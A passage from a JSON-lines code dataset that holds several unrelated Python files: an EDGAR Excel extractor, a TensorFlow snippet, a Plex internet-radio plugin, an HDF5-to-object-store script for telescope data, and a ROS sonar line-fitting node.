f.f_globals)\r\n print('EXCEPTION IN ({}, LINE {} \"{}\"): {}'.format(\r\n filename, lineno, line.strip(), exc_obj))\r\n cur_logger.error(\"WORKER -- EXCEPTION IN ------\"+str(filename)+\" ----- lineno --\"+str(line.strip())+\" ACTUAL EXECEPTION \"+str(exc_obj))\r\n\r\nclass ExcelMaster(object):\r\n\r\n def __init__(self):\r\n logger = self.get_logger()\r\n logger.info(\" Logger is initialized in ExcelMaster \")\r\n\r\n def process_edgar_files(self,tick_array_by_cat,df_cik,as_of_tms_est):\r\n try:\r\n excel_util = ExcelUtil()\r\n with open(METRIC_DATA_PATH, 'r') as metric_config_file:\r\n metric_config = eval(metric_config_file.read())\r\n logger.info(\" metric_config \"+str(metric_config))\r\n company_code_array = excel_util.get_required_company_codes(df_cik,tick_array_by_cat)\r\n company_file_dict = excel_util.get_company_file_dict(company_code_array)\r\n for companyCode,excel_list in company_file_dict.items():\r\n logger.info(\"------------------------------- Started processs for company \"+str(companyCode)+ \" ----------------------------------------------- \")\r\n company_key_frames = []\r\n final_merged_df = pd.DataFrame()\r\n counter = 0\r\n for current_excel in excel_list:\r\n counter = counter + 1\r\n logger.info(\" Processing excel file no \"+str(counter)+ \" for company code \"+str(companyCode))\r\n ticker_df_array = []\r\n key_df = excel_util.find_keys_in_excel(current_excel,metric_config,companyCode)\r\n if(key_df.empty):\r\n pass\r\n else: \r\n company_key_frames.append(key_df)\r\n if(len(company_key_frames) > 0):\r\n final_merged_df = excel_util.merge_frames(company_key_frames,\"inner\",False)\r\n logger.info(\" final_merged_df for \"+str(companyCode)+\" are \"+str(final_merged_df.head())) \r\n if(final_merged_df.empty):\r\n logger.info(\" Final df is empty \")\r\n final_merged_df = self.check_for_latest_df(company_key_frames)\r\n if(final_merged_df.empty):\r\n logger.info(\" final Df is again enpty and does not have the latest 2017 data as well \") \r\n pass\r\n else: \r\n excel_util.run_insert(final_merged_df,str(companyCode),as_of_tms_est)\r\n logger.info(\"------------------------------- Process complete for company \"+str(companyCode)+ \" ----------------------------------------------- \")\r\n except Exception:\r\n logger.info(\" NO_DATA for \"+str(companyCode))\r\n PrintException()\r\n \r\n def check_for_latest_df(self,company_key_frames):\r\n for data_df in company_key_frames:\r\n col_names_array = list(data_df)\r\n if('YEAR_2017' in col_names_array):\r\n return data_df\r\n\r\n def load_cik(self):\r\n df_cik = pd.read_csv(CIK_FILE_PATH, sep='|')\r\n df_cik = df_cik.loc[df_cik['Exchange'].isin(EXCHANGES)]\r\n return df_cik\r\n\r\n def get_logger(self):\r\n logger = logging.getLogger(LOGGER_NAME)\r\n hdlr = logging.FileHandler(LOG_FILE_PATH)\r\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\r\n hdlr.setFormatter(formatter)\r\n logger.addHandler(hdlr) \r\n logger.setLevel(logging.INFO)\r\n return logger\r\n\r\n \r\nif __name__ == '__main__':\r\n tr = tracker.SummaryTracker()\r\n try:\r\n excel_master = ExcelMaster()\r\n excel_util = ExcelUtil()\r\n df_cik = excel_master.load_cik()\r\n logger = logging.getLogger(LOGGER_NAME)\r\n as_of_tms,as_of_tms_est = excel_util.get_time()\r\n logger.info(\" Define all constants which you will use going forward \")\r\n tick_array_by_cat = excel_util.fetch_ticks_by_category(TICK_CATEGORIES)\r\n if(JUST_TEST == 'Y'):\r\n tick_array_by_cat = JUST_TEST_ARRAY\r\n print(tick_array_by_cat)\r\n logger.info(\" We are going to run by category for companies --> \"+str(len(tick_array_by_cat)))\r\n excel_master.process_edgar_files(tick_array_by_cat,df_cik,as_of_tms_est)\r\n tr.print_diff()\r\n #logger.info(\" Total Length of dict is \"+str(len(valid_ticker_excel_dict)))\r\n except Exception as e:\r\n PrintException()\r\n finally:\r\n tr.print_diff()","sub_path":"coindab_extractor/edgar/excel_master.py","file_name":"excel_master.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"181593814","text":"import tensorflow as tf\n\na = tf.constant(1, shape=[1,3,2,2])\nb = tf.constant(3, shape=[1,3,2,2])\nc = b - a\nd = tf.square(c)\ne = tf.reduce_sum(d)\n\nsess = tf.InteractiveSession()\nprint(a)\nprint(b)\n\nprint(sess.run(e))","sub_path":"02.TensorFlow/Others/math_funcs.py","file_name":"math_funcs.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"43204033","text":"NAME = 'NL Internet Radio'\nART = 'art-default.jpg'\nICON = 'icon-default.png'\n\n####################################################################################################\ndef Start():\n\n\tObjectContainer.title1 = NAME\n\tObjectContainer.art = R(ART)\n\tDirectoryObject.thumb = R(ICON)\n\n\tHTTP.CacheTime = 0\n\n####################################################################################################\n@handler('/music/nlinternetradio', NAME, thumb=ICON, art=ART)\ndef MainMenu():\n\n\toc = ObjectContainer()\n\tjson_obj = JSON.ObjectFromString(Resource.Load('radio.json'))\n\n\tfor station in json_obj:\n\n\t\tif station['ext'] not in ('aac', 'mp3'):\n\t\t\tcontinue\n\n\t\tif 'thumb' in station:\n\t\t\tthumb = station['thumb']\n\t\telse:\n\t\t\tthumb = ''\n\n\t\toc.add(CreateTrackObject(\n\t\t\ttitle = station['title'],\n\t\t\turl = station['url'],\n\t\t\text = station['ext'],\n\t\t\tthumb = thumb\n\t\t))\n\n\treturn oc\n\n####################################################################################################\n@route('/music/nlinternetradio/track')\ndef CreateTrackObject(title, url, ext, thumb, include_container=False):\n\n\tif ext == 'aac':\n\t\tcontainer = 'aac'\n\t\taudio_codec = AudioCodec.AAC\n\telse:\n\t\tcontainer = 'mp3'\n\t\taudio_codec = AudioCodec.MP3\n\n\ttrack_obj = TrackObject(\n\t\tkey = Callback(CreateTrackObject, title=title, url=url, ext=ext, thumb=thumb, include_container=True),\n\t\trating_key = url,\n\t\ttitle = title,\n\t\tthumb = Resource.ContentsOfURLWithFallback(url=thumb, fallback=ICON),\n\t\titems = [\n\t\t\tMediaObject(\n\t\t\t\tparts = [\n\t\t\t\t\tPartObject(key=Callback(Play, url=url, extension=ext))\n\t\t\t\t],\n\t\t\t\tcontainer = container,\n\t\t\t\taudio_codec = audio_codec,\n\t\t\t\taudio_channels = 2\n\t\t\t)\n\t\t]\n\t)\n\n\tif include_container:\n\t\treturn ObjectContainer(objects=[track_obj])\n\telse:\n\t\treturn track_obj\n\n####################################################################################################\n@route('/music/nlinternetradio/play.{extension}')\ndef Play(url, extension):\n\n\treturn Redirect(url)\n","sub_path":"Contents/Code/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"97488776","text":"#!/usr/bin/env python\n\n################################################################################\n# Copyright (c) 2017-2018, National Research Foundation (Square Kilometre Array)\n#\n# Licensed under the BSD 3-Clause License (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy\n# of the License at\n#\n# https://opensource.org/licenses/BSD-3-Clause\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\n\"\"\"Simple script to take an HDF5 file and chunk it into objects.\n\nThis also populates a specified (or managed) Redis instance to hold\ntelescope state and other metadata.\n\nThe primary use is for testing the coming katdal access layer that will\nwrap up such an object+Redis dataset and provide the usual standard access.\n\nObjects are stored in chunks split over time and frequency but not baseline.\nThe chunking is chosen to produce objects with sizes on the order of 1 MB.\nThe schema used is as follows:\n\n /[/__<...>]\n\n - obj_base_name: for S3 this defaults to '//'\n - dataset_name: 'correlator_data' / 'weights' / 'flags' / etc.\n - indexN: chunk start index along N'th dimension (suppressed if 1 chunk only)\n\nThe following useful object parameters are stored in telstate, prefixed by\n'..':\n\n - ceph_pool: the name of the CEPH pool used\n - ceph_conf: copy of ceph.conf used to connect to target CEPH cluster\n - s3_endpoint: endpoint URL of S3 object store\n - : dict containing chunk info (dtype, shape and chunks)\n\"\"\"\n\nimport struct\nimport logging\nimport sys\nimport time\nimport shlex\nimport subprocess\nfrom itertools import product\n\nimport numpy as np\nimport katdal\nfrom katdal.chunkstore_rados import RadosChunkStore\nfrom katdal.chunkstore_s3 import S3ChunkStore\nfrom katdal.chunkstore_dict import DictChunkStore\nimport katsdptelstate\nimport katsdpservices\nimport dask\nimport dask.array as da\nfrom dask.diagnostics import ProgressBar\n\n\nlogging.basicConfig()\n\nlogger = logging.getLogger('h5toobj')\nlogger.setLevel(logging.INFO)\n\n\ndef parse_args():\n parser = katsdpservices.ArgumentParser()\n parser.add_argument('file', type=str, nargs=1,\n metavar='FILE', help='HDF5 file to process')\n parser.add_argument('--base-name', type=str, metavar='BASENAME',\n help='Base name for objects (should include bucket '\n 'name for S3 object store)')\n parser.add_argument('--obj-size', type=float, default=2.0,\n help='Target object size in MB')\n parser.add_argument('--max-dumps', type=int, default=0,\n help='Number of dumps to process. Default is all.')\n parser.add_argument('--ceph-conf', type=str, default=\"/etc/ceph/ceph.conf\",\n metavar='CEPHCONF',\n help='Ceph configuration file used for cluster connect')\n parser.add_argument('--ceph-pool', type=str, metavar='POOL',\n help='Ceph pool to use for object storage')\n parser.add_argument('--ceph-keyring',\n help='Ceph keyring to use for object storage')\n parser.add_argument('--s3-url', type=str,\n help='S3 endpoint URL (includes leading \"http\")')\n parser.add_argument('--redis', type=str,\n help='Redis host to connect to as Telescope State. '\n 'Default is to start a new local instance.')\n parser.add_argument('--redis-port', type=int, default=6379,\n help='Port to use when connecting to Redis instance '\n '(or creating a new one)')\n parser.add_argument('--redis-only', action='store_true',\n help='Only (re)build Redis DB - no object creation')\n parser.add_argument('--obj-only', action='store_true',\n help='Only populate object store - no Redis update')\n args = parser.parse_args()\n if not args.redis_only:\n use_s3 = args.s3_url is not None\n use_rados = args.ceph_pool is not None\n if use_rados and use_s3:\n parser.error('Please specify either --ceph-pool or --s3-*')\n if args.base_name is None:\n args.base_name = args.file[0].split(\".\")[0]\n return args\n\n\ndef redis_gen_proto(*args):\n proto = ['*%d\\r\\n' % (len(args),)]\n proto += ['$%d\\r\\n%s\\r\\n' % (len(arg), arg) for arg in args]\n return ''.join(proto)\n\n\ndef redis_bulk_str(r_str, host, port):\n bulk_cmd = \"redis-cli --pipe -h {} -p {}\".format(host, port)\n bulk_redis = subprocess.Popen(shlex.split(bulk_cmd), stdin=subprocess.PIPE,\n stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n (retout, reterr) = bulk_redis.communicate(input=r_str)\n if bulk_redis.returncode:\n logger.error(\"Failed on bulk key insert. Retcode: %d, Stderr: %s, \"\n \"Stdout: %s\", bulk_redis.returncode, retout, reterr)\n sys.exit()\n logger.debug(\"Bulk insert r_str of len %d completed: %s\", len(r_str), retout)\n\n\ndef generate_chunks(shape, dtype, target_object_size, dims_to_split=(0, 1)):\n \"\"\"\"\"\"\n dataset_size = np.prod(shape) * dtype.itemsize\n num_chunks = np.ceil(dataset_size / float(target_object_size))\n chunks = [(s,) for s in shape]\n for dim in dims_to_split:\n if dim >= len(shape):\n continue\n if num_chunks > 0.5 * shape[dim]:\n chunk_sizes = (1,) * shape[dim]\n else:\n items = np.arange(shape[dim])\n chunk_indices = np.array_split(items, num_chunks)\n chunk_sizes = tuple([len(chunk) for chunk in chunk_indices])\n chunks[dim] = chunk_sizes\n num_chunks = np.ceil(num_chunks / len(chunk_sizes))\n return tuple(chunks)\n\n\ndef dsk_from_chunks(chunks, out_name):\n keys = list(product([out_name], *[range(len(bds)) for bds in chunks]))\n slices = da.core.slices_from_chunks(chunks)\n return zip(keys, slices)\n\n\nif __name__ == '__main__':\n args = parse_args()\n try:\n f = katdal.open(args.file[0])\n h5_file = f.file\n except Exception:\n logger.exception(\"Failed to open specified HDF5 file\")\n sys.exit()\n try:\n vis = h5_file['Data/correlator_data']\n except KeyError:\n logger.exception(\"This does not appear to be a valid MeerKAT HDF5 file\")\n sys.exit()\n\n if args.obj_only:\n redis_endpoint = args.redis = redis_host = ''\n elif args.redis is None:\n logger.info(\"Launching local Redis instance\")\n try:\n launch_cmd = \"/usr/bin/redis-server --port {}\".format(args.redis_port)\n local_redis = subprocess.Popen(shlex.split(launch_cmd),\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE)\n except OSError:\n launch_cmd = \"/usr/local/bin/redis-server --port {}\".format(args.redis_port)\n local_redis = subprocess.Popen(shlex.split(launch_cmd),\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE)\n time.sleep(3)\n if local_redis.poll():\n logger.error(\"Failed to launch local Redis instance, terminating. %s\",\n local_redis.communicate())\n sys.exit()\n logger.info(\"Local Redis instance launched successfully\")\n redis_host = 'localhost'\n redis_endpoint = '{}:{}'.format(redis_host, args.redis_port)\n else:\n redis_host = args.redis\n redis_endpoint = '{}:{}'.format(redis_host, args.redis_port)\n ts = katsdptelstate.TelescopeState(redis_endpoint)\n logger.info(\"Connected to Redis on %s. DB has %d existing keys\",\n redis_endpoint, len(ts.keys()))\n\n r_str = \"\"\n for attr in h5_file['TelescopeState'].attrs:\n r_str += redis_gen_proto(\"SET\", attr, h5_file['TelescopeState'].attrs[attr])\n if redis_endpoint:\n redis_bulk_str(r_str, redis_host, args.redis_port)\n\n if not args.obj_only:\n for d_count, dset in enumerate(h5_file['TelescopeState'].keys()):\n st = time.time()\n r_str = \"\"\n d_val = h5_file['TelescopeState'][dset].value\n # much quicker to read it first and then iterate\n for (timestamp, pval) in d_val:\n packed_ts = struct.pack('>d', float(timestamp))\n r_str += redis_gen_proto(\"ZADD\", str(dset), \"0\", packed_ts + pval)\n bss = time.time()\n if redis_endpoint:\n redis_bulk_str(r_str, redis_host, args.redis_port)\n logger.info(\"Added %d items in %gs to key %s. Bulk insert time: %g\",\n len(d_val), time.time() - st, dset, time.time() - bss)\n logger.info(\"Added %d ranged keys to TelescopeState\", d_count + 1)\n\n if args.redis_only and args.redis is None:\n logger.warning(\"Terminating locally launched redis instance \"\n \"(also saves telstate to local dump.rdb)\")\n try:\n cli_cmd = \"/usr/bin/redis-cli -p {} SHUTDOWN SAVE\".format(args.redis_port)\n subprocess.call(shlex.split(cli_cmd))\n except OSError:\n cli_cmd = \"/usr/local/bin/redis-cli -p {} SHUTDOWN SAVE\".format(args.redis_port)\n subprocess.call(shlex.split(cli_cmd))\n local_redis.terminate()\n\n if args.redis_only:\n logger.warning(\"Building Redis DB only - no data will be written...\")\n sys.exit(0)\n\n program_block = f.experiment_id\n stream = 'sdp_l0'\n ts_pbs = ts.view(program_block + '.' + stream)\n max_dumps = args.max_dumps if args.max_dumps > 0 else vis.shape[0]\n\n use_rados = args.ceph_pool is not None\n if use_rados:\n obj_store = RadosChunkStore.from_config(args.ceph_conf, args.ceph_pool,\n args.ceph_keyring)\n pool_stats = obj_store.ioctx.get_stats()\n logger.info(\"Connected to pool %s. Currently holds %d objects \"\n \"totalling %g GB\", args.ceph_pool,\n pool_stats['num_objects'], pool_stats['num_bytes'] / 1e9)\n ts_pbs.add(\"ceph_pool\", args.ceph_pool, immutable=True)\n with open(args.ceph_conf, \"r\") as ceph_conf:\n ts_pbs.add(\"ceph_conf\", ceph_conf.readlines(), immutable=True)\n else:\n obj_store = S3ChunkStore.from_url(args.s3_url)\n ts_pbs.add(\"s3_endpoint\", args.s3_url, immutable=True)\n\n target_object_size = args.obj_size * 2 ** 20\n dask_graph = {}\n schedule = dask.threaded.get\n output_keys = []\n h5_store = DictChunkStore(**h5_file['Data'])\n for dataset, arr in h5_store.arrays.iteritems():\n dataset = str(dataset)\n dtype = arr.dtype\n shape = arr.shape\n get = h5_store.get\n if dataset == 'correlator_data':\n # Convert from 2x float32 to complex64 (and swallow last dimension)\n dtype = np.dtype(np.complex64)\n shape = shape[:-1]\n get = lambda d, s, t: h5_store.get(d, s + (slice(0, 2),),\n np.dtype(np.float32)).view(t)[..., 0]\n base_name = obj_store.join(args.base_name, program_block, stream, dataset)\n shape = (min(shape[0], max_dumps),) + shape[1:]\n chunks = generate_chunks(shape, dtype, target_object_size)\n num_chunks = np.prod([len(c) for c in chunks])\n chunk_size = np.prod([c[0] for c in chunks]) * dtype.itemsize\n logger.info(\"Splitting dataset %r with shape %s and dtype %s into %d chunk(s) of \"\n \"~%d bytes each\", base_name, shape, dtype, num_chunks, chunk_size)\n dask_info = {'dtype': dtype, 'shape': shape, 'chunks': chunks}\n ts_pbs.add(dataset, dask_info, immutable=True)\n dsk = {k: (obj_store.put, base_name, s, (get, dataset, s, dtype))\n for k, s in dsk_from_chunks(chunks, 'copy_' + dataset)}\n dask_graph.update(dsk)\n output_keys.extend(dsk.keys())\n with ProgressBar():\n schedule(dask_graph, output_keys)\n logger.info(\"Staging complete...\")\n\n if args.redis is None:\n raw_input(\"You have started a local Redis server. \"\n \"Hit enter to kill this and cleanup.\")\n local_redis.terminate()\n","sub_path":"scripts/h5toobj.py","file_name":"h5toobj.py","file_ext":"py","file_size_in_byte":12715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"535319345","text":"#!/usr/bin/env python\n\nimport rospy\nimport numpy as np\nfrom nav_msgs.msg import Odometry\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom std_msgs.msg import ColorRGBA\nfrom geometry_msgs.msg import PoseStamped, PointStamped, TransformStamped, Point, Point32\nimport sys\nfrom sss_object_detection.msg import line\nimport matplotlib.pyplot as plt\nfrom sensor_msgs.msg import PointCloud\nimport random\n#import open3d as o3d\n#import pyransac3d as pyrsc\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom skimage.measure import LineModelND, ransac\nfrom sklearn.linear_model import LinearRegression, RANSACRegressor\nimport tf2_ros\nimport tf2_geometry_msgs\n\n\nclass sim_sss_detector:\n \n def __init__(self,\n robot_name,\n noise_sigma= 0.001):\n self.noise_sigma = noise_sigma\n self.robot_name = robot_name\n self.prev_pose = None\n self.current_pose = None\n self.robot_msg = None\n self.yaw = None\n self.frame_id = None\n self.stamp = rospy.Time.now()\n self.marked_positions_x = []\n self.marked_positions_y =[]\n self.marked_ns = {}\n self.gt_frame_id = 'gt/{}/base_link'.format(self.robot_name)\n self.published_frame_id = '{}/base_link'.format(self.robot_name)\n self.world_frame_id = \"world_ned\"\n\n self.counter = 0.0\n\n self.inliers = []\n self.A = []\n self.B = []\n self.pcl = []\n #self.points = []\n self.marker3_x ={}\n self.marker3_y= {}\n\n self.X = []\n self.Y = []\n self.tf_buffer = tf2_ros.Buffer()\n self.tf_listener = tf2_ros.TransformListener(self.tf_buffer)\n self.marked_positions = {}\n self.point_list=[]\n #self.tf_buffer = tf2_ros.Buffer()\n #self.tf_listener = tf2_ros.TransformListener(self.tf_buffer)\n self.odom_sub = rospy.Subscriber(\n '/{}/sim/odom'.format(self.robot_name), Odometry,\n self._update_pose)\n self.marked_3_sub = rospy.Subscriber(\n '/{}/sim/marker3'.format(robot_name), PointStamped,\n self.marker3_pose)\n self.intercept_sub = rospy.Subscriber('/{}/sim/intercepts'.format(robot_name), PointCloud, self._point_cloud)\n self.pub_intercept_map = rospy.Publisher('/{}/sim/intercept_points'.format(robot_name), PointStamped, queue_size=10)\n self.pub_fitted_line = rospy.Publisher('/{}/sim/fitted_line'.format(robot_name), Marker, queue_size=10)\n self.pub_predicted_intercept = rospy.Publisher('/{}/sim/predicted_intercepts'.format(robot_name), PointStamped, queue_size=10)\n\n #self.intercept_utm = rospy.Subscriber('/{}/sim/intercepts_utm'.format(robot_name), PointStamped, self._point_cloud)\n\n \n def marker3_pose(self, msg):\n \"\"\"Update prev_pose and current_pose according to the odom msg received\"\"\"\n #print >>sys.stderr, 'robot pose:::::::::::::::::: = \"%s\"' % msg\n\n self.marker3_x = msg.point.x\n self.marker3_y = msg.point.y\n\n #return self.marker3_x, self.marker3_y\n\n\n def _update_pose(self, msg):\n \"\"\"Update pose based on msg from simulated groundtruth odom at /{robot_name}/sim/odom\"\"\"\n \n #print >>sys.stderr, 'robot pose:::::::::::::::::: = \"%s\"' % msg\n\n self.current_pose = self._transform_pose(\n msg.pose, from_frame=msg.header.frame_id).pose\n #print >>sys.stderr, 'self.current_pose:::::::::::::::::: = \"%s\"' % self.current_pose\n\n\n def _point_cloud(self,pts):\n \"\"\"Subscribing to the intercept points which are published in map frame\"\"\"\n #print >>sys.stderr, 'Point_Cloud= \"%s\"' % pts\n for i in range(len(pts.points)):\n points_x = pts.points[i].x\n points_y = pts.points[i].y\n points_z = pts.points[i].z\n\n point_list = [points_x, points_y, points_z]\n #print >>sys.stderr, 'point_list = \"%s\"' % point_list\n self.X.append(point_list[0])\n self.Y.append(point_list[1])\n self.pcl.append(point_list)\n points_np = np.array(self.pcl)\n\n\n \"\"\"Publishing the latest intercepts as Point Stamped \"\"\"\n intercept_point = PointStamped()\n intercept_point.header.frame_id = \"map\"\n intercept_point.header.stamp = rospy.Time(0)\n intercept_point.point.x = np.float64(points_np[len(points_np)-1][0])\n intercept_point.point.y = np.float64(points_np[len(points_np)-1][1])\n intercept_point.point.z = np.float64(points_np[len(points_np)-1][2])\n self.pub_intercept_map.publish(intercept_point)\n\n #print >>sys.stderr, 'y = \"%s\"' % points_np[len(points_np)-1][1]\n #print >>sys.stderr, 'x = \"%s\"' % points_np[len(points_np)-1][0]\n \n \"\"\"Using RANSAC to fit a line ,\n fitting the after the robot has passed y = 8 and has 25 samples to fit a line with\"\"\"\n #r = rospy.Rate(15.)\n \n \n if points_np[len(points_np)-1][1] >= 15:\n #print >>sys.stderr, 'counter1 = \"%s\"' % self.counter \n #print >>sys.stderr, 'range1 = \"%s\"' % int(points_np[len(points_np)-1][1])\n #if self.counter <= int(points_np[len(points_np)-1][1]):\n #print >>sys.stderr, 'counter2 = \"%s\"' % self.counter \n #print >>sys.stderr, 'range2 = \"%s\"' % int(points_np[len(points_np)-1][1])\n \"\"\"Changing the corrdinates as in the moving point cloud self.Y increases as the robot moves forward\"\"\"\n X= np.array(self.Y)\n y= np.array(self.X)\n \n ransac = RANSACRegressor(LinearRegression(), \n max_trials=100, \n min_samples=10, \n residual_threshold=0.001)\n ransac.fit(X.reshape(-1,1), y)\n inlier_mask = ransac.inlier_mask_\n outlier_mask = np.logical_not(inlier_mask)\n \n #line_X = np.arange(3, 14, 1)\n #line_y_ransac = ransac.predict(line_X[:, np.newaxis]) \n # fig = plt.figure()\n # ax = fig.add_subplot(111)\n # ax.scatter(X[inlier_mask], y[inlier_mask], c='blue', marker='o', label='Inliers')\n # ax.scatter(X[outlier_mask], y[outlier_mask], c='lightgreen', marker='s', label='Outliers') \n # ax.plot(line_X, line_y_ransac, color='red') \n #print >>sys.stderr,'Slope: \"%.3f\"' % ransac.estimator_.coef_[0]\n #print >>sys.stderr,'Intercept: \"%.3f\"' % ransac.estimator_.intercept_\n\n predicted_intercept_map =PointStamped()\n predicted_intercept_map.header.frame_id = \"map\"\n predicted_intercept_map.header.stamp = rospy.Time(0)\n x_pred = np.float64(X[len(X)-1]+5.0)\n #self.counter = int(x_pred)\n m_slope = ransac.estimator_.coef_[0]\n #print >>sys.stderr,'m_slope: ' % m_slope\n c_intercept = ransac.estimator_.intercept_\n #print >>sys.stderr,'c_intercept: ' % c_intercept\n y_pred = (x_pred*m_slope) + c_intercept\n\n \"\"\" Changing the coordinates back to its original form while publishing\"\"\"\n predicted_intercept_map.point.x = y_pred\n predicted_intercept_map.point.y = x_pred\n predicted_intercept_map = self._transform_pose_2_utm_intercept(predicted_intercept_map,predicted_intercept_map.header.frame_id)\n\n \"\"\"Publishing the predicted intercepts in utm frame\"\"\"\n predicted_intercept = PointStamped()\n predicted_intercept.point.x = predicted_intercept_map.pose.position.x\n predicted_intercept.point.y = predicted_intercept_map.pose.position.y\n predicted_intercept.header.frame_id = predicted_intercept_map.header.frame_id\n\n self.pub_predicted_intercept.publish(predicted_intercept)\n #rospy.sleep(3.0)\n #plt.show()\n \n \n \"\"\"Fit a line using 3D points\"\"\"\n \"\"\"\n print >>sys.stderr, 'points = \"%s\"' % points_np\n model_robust, inliers = ransac(points_np, LineModelND, min_samples=2,\n residual_threshold=1, max_trials=100)\n #print(inliers)\n outliers = inliers == False\n line_x = np.arange(-5.1, -4.85, 0.01)\n #line_y = model.predict_y(line_x)\n line_y_robust = model_robust.predict_y(line_x)\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(points_np[inliers][:, 0], points_np[inliers][:, 1], points_np[inliers][:, 2], c='b',\n marker='o', label='Inlier data')\n ax.scatter(points_np[outliers][:, 0], points_np[outliers][:, 1], points_np[outliers][:, 2], c='r',\n marker='o', label='Outlier data')\n ax.set_ylim([3,14])\n ax.plot(line_x, line_y_robust, '-b', label='Robust line model')\n ax.legend(loc='lower left')\n print >>sys.stderr,'Slope: \"%.3f\"' % model_robust.estimator_.coef_[0]\n print >>sys.stderr,'Intercept: \"%.3f\"' % model_robust.estimator_.intercept_\n plt.show()\n \"\"\"\n\n \"\"\"Same as above, fit a line with 3d points\"\"\"\n \"\"\"\n print >>sys.stderr, 'points = \"%s\"' % points_np\n print >>sys.stderr, 'points = \"%s\"' % type(points)\n\n print >>sys.stderr, 'self.pcl = \"%s\"' % self.pcl\n\n self.A, self.B, self.inliers = self._Ransacc(points_np)\n\n print >>sys.stderr, 'self.A= \"%s\"' % self.A\n print >>sys.stderr, 'self.B= \"%s\"' % self.B\n print >>sys.stderr, 'self.inliers= \"%s\"' % self.inliers\n \"\"\"\n \"\"\"\n def _Ransacc(self, pts, thresh=0.2, maxIteration=1000):\n n_points = pts.shape[0]\n best_inliers = []\n\n for it in range(maxIteration):\n\n # Samples 2 random points\n id_samples = random.sample(range(0, n_points), 2)\n pt_samples = pts[id_samples]\n\n # The line defined by two points is defined as P2 - P1\n vecA = pt_samples[1, :] - pt_samples[0, :]\n vecA_norm = vecA / np.linalg.norm(vecA)\n\n # Distance from a point to a line\n pt_id_inliers = [] # list of inliers ids\n vecC_stakado = np.stack([vecA_norm] * n_points, 0)\n dist_pt = np.cross(vecC_stakado, (pt_samples[0, :] - pts))\n dist_pt = np.linalg.norm(dist_pt, axis=1)\n\n # Select indexes where distance is biggers than the threshold\n pt_id_inliers = np.where(np.abs(dist_pt) <= thresh)[0]\n\n if len(pt_id_inliers) > len(best_inliers):\n best_inliers = pt_id_inliers\n self.inliers = best_inliers\n self.A = vecA_norm\n self.B = pt_samples[0, :]\n \n return self.A, self.B, self.inliers\n \"\"\"\n\n def _wait_for_transform(self, from_frame, to_frame):\n \"\"\"Wait for transform from from_frame to to_frame\"\"\"\n trans = None\n while trans is None:\n try:\n trans = self.tf_buffer.lookup_transform(\n to_frame, from_frame, rospy.Time())\n except (tf2_ros.LookupException, tf2_ros.ConnectivityException,\n tf2_ros.ExtrapolationException) as error:\n print('Failed to transform. Error: {}'.format(error))\n return trans \n def _transform_pose_2_utm_intercept(self, predicted_point, from_frame):\n \"\"\"Transform intercepts from map frame to utm frame and shifting the x by 2 units, so that \n when robot tries to goto this waypoint it doesn't hits the rope\"\"\"\n pose =PoseStamped()\n pose.pose.position.x = predicted_point.point.x\n pose.pose.position.y = predicted_point.point.y\n pose.pose.position.z = 0.0\n trans = self._wait_for_transform(from_frame=from_frame,\n to_frame=\"utm\")\n pose_transformed = tf2_geometry_msgs.do_transform_pose(pose, trans)\n return pose_transformed \n\n def _transform_pose(self, pose, from_frame):\n trans = self._wait_for_transform(from_frame=from_frame,\n to_frame=self.gt_frame_id)\n pose_transformed = tf2_geometry_msgs.do_transform_pose(pose, trans)\n return pose_transformed\n\n def _rviz_line(self,X, Y):\n marker_line = Marker()\n marker_line.header.frame_id = self.published_frame_id\n marker_line.header.stamp =rospy.Time.now()\n marker_line.type = marker_line.LINE_STRIP\n marker_line.action = marker_line.ADD\n\n # marker scale\n marker_line.scale.x = 0.03\n marker_line.scale.y = 0.03\n marker_line.scale.z = 0.0\n\n # marker color\n\n marker_line.color.a = 1.0\n marker_line.color.r = 1.0\n marker_line.color.g = 1.0\n marker_line.color.b = 1.0\n\n\n # marker orientaiton\n marker_line.pose.orientation.x = 0.0\n marker_line.pose.orientation.y = 0.0\n marker_line.pose.orientation.z = 0.0\n marker_line.pose.orientation.w = 1.0\n\n # marker position\n marker_line.pose.position.x = 0.0\n marker_line.pose.position.y = 0.0\n marker_line.pose.position.z = 0.0\n #print >>sys.stderr, 'X = \"%s\"' % X\n #print >>sys.stderr, 'Y = \"%s\"' % Y\n # marker line points\n marker_line.points = []\n # first point\n first_line_point = Point()\n first_line_point.x = X[0]\n first_line_point.y = Y[0]\n first_line_point.z = 0.0\n marker_line.points.append(first_line_point)\n # second point\n second_line_point = Point()\n second_line_point.x = X[1]\n second_line_point.y = Y[1]\n second_line_point.z = 0.0\n marker_line.points.append(second_line_point)\n\n # Publish the Marker\n self.pub_fitted_line.publish(marker_line)\n\ndef main():\n rospy.init_node('sim_lines_wf', anonymous=True)\n rospy.Rate(5) # ROS Rate at 5Hz\n\n robot_name_param = '~robot_name'\n if rospy.has_param(robot_name_param):\n robot_name = rospy.get_param(robot_name_param)\n print('Getting robot_name = {} from param server'.format(robot_name))\n else:\n robot_name = 'sam'\n print('{} param not found in param server.\\n'.format(robot_name_param))\n print('Setting robot_name = {} default value.'.format(robot_name))\n\n detector = sim_sss_detector(robot_name=robot_name)\n\n while not rospy.is_shutdown():\n rospy.spin()\n\n\nif __name__ == '__main__':\n 